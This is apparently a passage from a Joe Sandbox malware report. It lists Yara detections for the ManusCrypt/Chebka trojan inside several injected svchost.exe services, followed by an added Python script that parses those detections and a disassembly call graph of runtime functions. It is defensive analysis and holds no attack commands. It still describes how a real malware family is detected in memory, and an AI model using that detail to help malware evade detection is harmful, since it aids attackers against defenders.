                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001E.00000003.375298554.000001E554180000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001E.00000003.375298554.000001E554180000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000002.794976887.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001E.00000002.794976887.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001E.00000002.794976887.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001E.00000002.794976887.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 0000001E.00000000.383434403.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 0000001E.00000000.383434403.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 0000001E.00000000.383434403.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 0000001E.00000000.383434403.000001E554740000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
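
The Target ID blocks above repeat the same pattern: every netsvcs-hosted svchost.exe the sample reaches carries the ManusCrypt / Chebka Yara hits in its memory dumps, and the page's own data shows MALWARE_Win_Chebka firing only on dumps whose fifth name field is 00000040 while the 00000004 dumps get only the stub and generic rules. The helper below is an added triage example, not Joe Sandbox's code and not part of the report: it parses the "Rule: ..., Source: ....sdmp, Author: ..." bullet lines exactly as printed here, groups the hits per process and memory region, and flags regions whose protection field decodes as executable. The dump-name layout (target id, stage, dump id, base address, page protection, then unparsed fields), the stage labels start/end/intermediate and the reading of the fifth field as a Win32 PAGE_* constant are assumptions of this example; only the PAGE_* values themselves (winnt.h) are established facts. The sample input is four lines copied from the Target ID 20 block.

```python
"""Triage helper for the Yara-match bullets in a Joe Sandbox process block.

Added example, not part of the report or of Joe Sandbox. It parses the
'Rule: ..., Description: ..., Source: <dump>.sdmp, Author: ...' lines and
summarises which process, stage and memory region each rule hit.

Assumptions (not stated on the page): the dotted dump name is read as
<target id hex>.<stage>.<dump id>.<base address>.<page protection>.<...>,
the page-protection field is decoded with the Win32 PAGE_* constants from
winnt.h (0x04 = PAGE_READWRITE, 0x40 = PAGE_EXECUTE_READWRITE), and stage
values 0/2/3 are labelled start/end/intermediate as a naming guess.
"""
import re
from collections import defaultdict

# Constructed sample: four bullet lines copied from the Target ID 20 block.
SAMPLE = """\
• Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000014.00000003.326589186.000002468B540000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
• Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000014.00000003.326589186.000002468B540000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000014.00000000.327486913.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000014.00000002.794366066.000002468B5B0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
"""

LINE_RE = re.compile(
    r"Rule:\s*(?P<rule>[^,]+),\s*Description:\s*(?P<desc>.*?),\s*"
    r"Source:\s*(?P<source>\S+?\.sdmp),\s*Author:\s*(?P<author>.+)$"
)

# Win32 page-protection constants (winnt.h); the high nibble marks executable pages.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
STAGE_NAMES = {0: "start", 2: "end", 3: "intermediate"}  # assumed labels


def parse_dump_name(name):
    """Split a .sdmp name into its assumed fields; trailing fields are ignored."""
    parts = name[: -len(".sdmp")].split(".")
    if len(parts) < 5:
        raise ValueError(f"unexpected dump name: {name}")
    target, stage, dump_id, base, protect = parts[:5]
    prot = int(protect, 16)
    return {
        "target_id": int(target, 16),
        "stage": STAGE_NAMES.get(int(stage, 16), f"stage{int(stage, 16)}"),
        "dump_id": dump_id,
        "base": int(base, 16),
        "protect": PAGE_PROTECT.get(prot & 0xFF, hex(prot)),
        "executable": bool(prot & 0xF0),
    }


def parse_matches(text):
    """Return one record per Yara bullet line; non-matching lines are skipped."""
    matches = []
    for line in text.splitlines():
        m = LINE_RE.search(line)
        if not m:
            continue
        rec = dict(m.groupdict())
        rec.update(parse_dump_name(rec["source"]))
        matches.append(rec)
    return matches


def summarize(matches):
    """Group hits by (target id, region base): rules seen, stages seen, protection."""
    regions = defaultdict(lambda: {"rules": set(), "stages": set(),
                                   "protect": None, "executable": False})
    for r in matches:
        reg = regions[(r["target_id"], r["base"])]
        reg["rules"].add(r["rule"])
        reg["stages"].add(r["stage"])
        reg["protect"] = r["protect"]
        reg["executable"] = r["executable"]
    return regions


def rwx_regions(matches):
    """(target id, base) pairs whose matched dump is executable: the unpacked payload candidates."""
    return sorted(k for k, v in summarize(matches).items() if v["executable"])


if __name__ == "__main__":
    for (tid, base), reg in sorted(summarize(parse_matches(SAMPLE)).items()):
        flag = "EXEC" if reg["executable"] else "    "
        print(f"{flag} target {tid:>3} base {base:#x} {reg['protect']:<24} "
              f"stages={sorted(reg['stages'])} rules={sorted(reg['rules'])}")
```

Run over the whole Yara listing instead of the four-line sample, the executable regions are the ones to carve and hash from the dumps; the read-write region in each block is the staged copy that precedes them, which is why it only trips the XORed-stub and generic rules.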

                                                          Target ID:32
                                                          Start time:10:17:17
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Themes
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000020.00000003.386033899.000001AF63730000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000020.00000003.386033899.000001AF63730000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000020.00000003.386033899.000001AF63730000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000020.00000000.386933672.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000020.00000000.386933672.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000020.00000000.386933672.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000020.00000000.386933672.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000020.00000002.792774894.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000020.00000002.792774894.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000020.00000002.792774894.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000020.00000002.792774894.000001AF63D40000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:33
                                                          Start time:10:17:19
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000021.00000003.391694439.0000023E49540000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000021.00000003.391694439.0000023E49540000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000021.00000003.391694439.0000023E49540000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000021.00000002.796904806.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000021.00000002.796904806.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000021.00000002.796904806.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000021.00000002.796904806.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000021.00000000.392903215.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000021.00000000.392903215.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000021.00000000.392903215.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000021.00000000.392903215.0000023E495B0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:34
                                                          Start time:10:17:22
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000000.398624500.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000022.00000000.398624500.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000022.00000000.398624500.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000022.00000000.398624500.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000003.397243235.000001DD8FD40000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000022.00000003.397243235.000001DD8FD40000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000022.00000003.397243235.000001DD8FD40000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000022.00000002.797519932.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000022.00000002.797519932.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000022.00000002.797519932.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000022.00000002.797519932.000001DD8FDB0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:35
                                                          Start time:10:17:24
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000023.00000003.410681030.000002828E550000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000023.00000003.410681030.000002828E550000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000023.00000003.410681030.000002828E550000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000023.00000002.815223698.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000023.00000002.815223698.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000023.00000002.815223698.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000023.00000002.815223698.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000023.00000000.417666576.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000023.00000000.417666576.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000023.00000000.417666576.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000023.00000000.417666576.0000028291080000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:36
                                                          Start time:10:17:33
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000024.00000003.424328898.00000151ABE00000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000024.00000003.424328898.00000151ABE00000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000024.00000003.424328898.00000151ABE00000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000024.00000002.687779770.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000024.00000002.687779770.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000024.00000002.687779770.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000024.00000002.687779770.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000024.00000000.426604023.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000024.00000000.426604023.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000024.00000000.426604023.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000024.00000000.426604023.00000151ABE70000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:37
                                                          Start time:10:17:37
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                          Imagebase:0x7ff651c80000
                                                          File size:51288 bytes
                                                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000003.432969413.0000012DBC4A0000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000025.00000003.432969413.0000012DBC4A0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000025.00000003.432969413.0000012DBC4A0000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000000.435209774.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000025.00000000.435209774.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000025.00000000.435209774.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000025.00000000.435209774.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000025.00000002.800294358.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                          • Rule: JoeSecurity_ManusCrypt, Description: Yara detected ManusCrypt, Source: 00000025.00000002.800294358.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: MALWARE_Win_Chebka, Description: Detects Chebka, Source: 00000025.00000002.800294358.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                          • Rule: Windows_Trojan_Generic_a681f24a, Description: unknown, Source: 00000025.00000002.800294358.0000012DBC510000.00000040.00000001.00020000.00000000.sdmp, Author: unknown

                                                          Target ID:42
                                                          Start time:10:18:29
                                                          Start date:11/09/2022
                                                          Path:C:\Windows\System32\wbem\WMIADAP.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:wmiadap.exe /F /T /R
                                                          Imagebase:0x7ff68bd80000
                                                          File size:177664 bytes
                                                          MD5 hash:9783D0765F31980950445DFD40DB15DA
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                            Execution Graph

                                                            Execution Coverage:5.6%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:7.6%
                                                            Total number of Nodes:1625
                                                            Total number of Limit Nodes:50
40159b __getptd_noexit 69 API calls 6532->6533 6534 406790 6533->6534 6535 40159b __getptd_noexit 69 API calls 6534->6535 6536 40679b 6535->6536 6537 40159b __getptd_noexit 69 API calls 6536->6537 6538 4067a6 6537->6538 6539 40159b __getptd_noexit 69 API calls 6538->6539 6540 4067b1 6539->6540 6541 40159b __getptd_noexit 69 API calls 6540->6541 6542 4067bc 6541->6542 6543 40159b __getptd_noexit 69 API calls 6542->6543 6543->6544 6544->6414 6545->6388 6549 401cc1 LeaveCriticalSection 6546->6549 6548 405468 6548->6367 6549->6548 6551 40acba 6550->6551 6552 40158c __cftof_l 5 API calls 6551->6552 6553 40ae54 6552->6553 6553->6341 6840 4019d4 6843 403c61 6840->6843 6844 4031d2 __getptd_noexit 69 API calls 6843->6844 6845 403c6c 6844->6845 6846 403c72 UnhandledExceptionFilter 6845->6846 6847 403c80 6845->6847 6849 4019e5 6846->6849 6848 403cc2 UnhandledExceptionFilter 6847->6848 6847->6849 6848->6849 6781 406f15 6782 403688 __amsg_exit 69 API calls 6781->6782 6783 406f1c 6782->6783 6999 407f96 7002 407e7e 6999->7002 7003 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 7002->7003 7004 407e90 7003->7004 6554 405d57 6555 405d5a 6554->6555 6558 406f1e 6555->6558 6557 405d66 _doexit 6559 406f43 6558->6559 6560 406f4a 6558->6560 6561 403a88 __NMSG_WRITE 69 API calls 6559->6561 6574 405dca 6560->6574 6561->6560 6564 406f5b _memset 6566 407009 6564->6566 6568 406fde SetUnhandledExceptionFilter UnhandledExceptionFilter 6564->6568 6598 403915 6566->6598 6568->6566 6570 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 6571 407022 6570->6571 6572 40703c 6571->6572 6601 4073d5 6571->6601 6572->6557 6575 40304b __decode_pointer 5 API calls 6574->6575 6576 405dd5 6575->6576 6576->6564 6577 405dd7 6576->6577 6580 405de3 _doexit 6577->6580 6578 405e3f 6579 405e20 6578->6579 6584 405e4e 6578->6584 6583 40304b __decode_pointer 5 API calls 6579->6583 6580->6578 6580->6579 6581 405e0a 6580->6581 6585 405e06 6580->6585 6582 4031d2 __getptd_noexit 69 API calls 6581->6582 6586 405e0f 
_siglookup 6582->6586 6583->6586 6587 401b5b __cftof_l 69 API calls 6584->6587 6585->6581 6585->6584 6590 405eb5 6586->6590 6591 403915 _abort 69 API calls 6586->6591 6597 405e18 _doexit 6586->6597 6588 405e53 6587->6588 6589 402fbb __cftof_l 5 API calls 6588->6589 6589->6597 6592 401d99 __lock 69 API calls 6590->6592 6593 405ec0 6590->6593 6591->6590 6592->6593 6594 403042 ___crtMessageBoxA 5 API calls 6593->6594 6595 405ef5 6593->6595 6594->6595 6608 405f4b 6595->6608 6597->6564 6599 403836 _doexit 69 API calls 6598->6599 6600 403922 6599->6600 6600->6570 6602 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 6601->6602 6603 4073e7 6602->6603 6607 4073f4 6603->6607 6613 407175 6603->6613 6607->6572 6609 405f51 6608->6609 6610 405f58 6608->6610 6612 401cc1 LeaveCriticalSection 6609->6612 6610->6597 6612->6610 6614 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 6613->6614 6615 407186 6614->6615 6616 406aae 6615->6616 6617 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 6616->6617 6618 406abf 6617->6618 6621 4068f6 6618->6621 6622 406915 GetStringTypeW 6621->6622 6623 406940 6621->6623 6624 406935 GetLastError 6622->6624 6625 40692d 6622->6625 6623->6625 6626 406a27 6623->6626 6624->6623 6627 406979 MultiByteToWideChar 6625->6627 6643 406a21 6625->6643 6649 4071dc GetLocaleInfoA 6626->6649 6633 4069a6 6627->6633 6627->6643 6629 40158c __cftof_l 5 API calls 6631 406aac 6629->6631 6631->6607 6632 406a78 GetStringTypeA 6638 406a93 6632->6638 6632->6643 6634 4069bb _memset __alloca_probe_16 6633->6634 6635 405918 _malloc 69 API calls 6633->6635 6637 4069f4 MultiByteToWideChar 6634->6637 6634->6643 6635->6634 6641 406a0a GetStringTypeW 6637->6641 6642 406a1b 6637->6642 6639 40159b __getptd_noexit 69 API calls 6638->6639 6639->6643 6641->6642 6645 406895 6642->6645 6643->6629 6646 40689d 6645->6646 6647 4068ae 6645->6647 6646->6647 6648 40159b __getptd_noexit 69 API calls 6646->6648 6647->6643 6648->6647 6650 40720d 6649->6650 6652 407208 6649->6652 6680 407164 
6650->6680 6653 40158c __cftof_l 5 API calls 6652->6653 6654 406a4b 6653->6654 6654->6632 6654->6643 6655 407223 6654->6655 6656 4072eb 6655->6656 6657 407261 GetCPInfo 6655->6657 6660 40158c __cftof_l 5 API calls 6656->6660 6658 4072d6 MultiByteToWideChar 6657->6658 6659 407278 6657->6659 6658->6656 6664 407291 _strlen 6658->6664 6659->6658 6661 40727e GetCPInfo 6659->6661 6662 406a6c 6660->6662 6661->6658 6663 40728b 6661->6663 6662->6632 6662->6643 6663->6658 6663->6664 6665 405918 _malloc 69 API calls 6664->6665 6669 4072c3 _memset __alloca_probe_16 6664->6669 6665->6669 6666 407320 MultiByteToWideChar 6667 407357 6666->6667 6668 407338 6666->6668 6670 406895 __freea 69 API calls 6667->6670 6671 40735c 6668->6671 6672 40733f WideCharToMultiByte 6668->6672 6669->6656 6669->6666 6670->6656 6673 407367 WideCharToMultiByte 6671->6673 6674 40737b 6671->6674 6672->6667 6673->6667 6673->6674 6675 403552 __calloc_crt 69 API calls 6674->6675 6676 407383 6675->6676 6676->6667 6677 40738c WideCharToMultiByte 6676->6677 6677->6667 6678 40739e 6677->6678 6679 40159b __getptd_noexit 69 API calls 6678->6679 6679->6667 6683 4076b6 6680->6683 6684 4076cd 6683->6684 6687 40748b 6684->6687 6688 40546a _LocaleUpdate::_LocaleUpdate 79 API calls 6687->6688 6690 40749e 6688->6690 6689 4074b0 6691 401b5b __cftof_l 69 API calls 6689->6691 6690->6689 6695 4074ed 6690->6695 6692 4074b5 6691->6692 6693 402fbb __cftof_l 5 API calls 6692->6693 6697 407171 6693->6697 6694 4073d5 __isctype_l 93 API calls 6694->6695 6695->6694 6696 407532 6695->6696 6696->6697 6698 401b5b __cftof_l 69 API calls 6696->6698 6697->6652 6698->6697 5333 405918 5334 4059c5 5333->5334 5341 405926 5333->5341 5335 405fa5 _malloc 5 API calls 5334->5335 5337 4059cb 5335->5337 5336 40593b 5336->5341 5352 403c28 5336->5352 5361 403a88 5336->5361 5395 4036d2 5336->5395 5339 401b5b __cftof_l 68 API calls 5337->5339 5340 4059d1 5339->5340 5341->5336 5344 405989 RtlAllocateHeap 5341->5344 5346 4059b0 5341->5346 5349 4059ae 
